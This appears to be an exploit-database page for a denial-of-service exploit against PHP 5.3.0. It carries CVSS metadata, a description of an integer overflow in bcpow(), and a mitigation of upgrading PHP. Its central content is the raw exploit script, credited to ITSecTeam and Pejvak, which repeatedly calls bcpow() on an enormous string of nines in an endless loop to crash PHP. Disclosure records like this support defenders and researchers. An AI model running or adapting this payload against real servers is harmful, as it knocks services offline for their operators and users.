Dos Php 5.3.0

vendor:

PHP

by:

ITSecTeam

7,5

CVSS

HIGH

Denial of Service (DoS)

190

CWE

Product Name: PHP

Affected Version From: 5.3.0

Affected Version To: 5.3.0

Patch Exists: YES

Related CWE: N/A

CPE: a:php:php:5.3.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3 and Redhat

2010

This exploit is a Denial of Service (DoS) vulnerability in PHP 5.3.0. It is caused by an integer overflow in the bcpow() function. The exploit code creates a large string of 9s and passes it to the bcpow() function, which causes an integer overflow and results in a crash. The code is written in PHP and was coded by Pejvak.

Mitigation:

Upgrade to the latest version of PHP.

Source

Exploit-DB raw data:

//#DOS Php 5.3.x
//###########################################################################
//#Title: Dos Php 5.3.0
//#Vendor: http://php.net
//#Tested On Php 5.3.0 On Windows xp Sp3 And Redhat
//###########################################################################
//#AUTHOR: ITSecTeam
//#Email: Bug@ITSecTeam.com
//#Website: http://www.itsecteam.com
//#Forum : http://forum.ITSecTeam.com
//#Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability34.htm
//#Thanks: Pejvak,M3hr@nS,r3dm0v3,am!rkh@n
//###########################################################################
//#
//# Exploit
//###########################################################################
<?php
$junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
for($i=0;$i<2;){
$buff=bcpow($junk, '3', 2);
$buff=null;
}
//Coded By Pejvak;
?>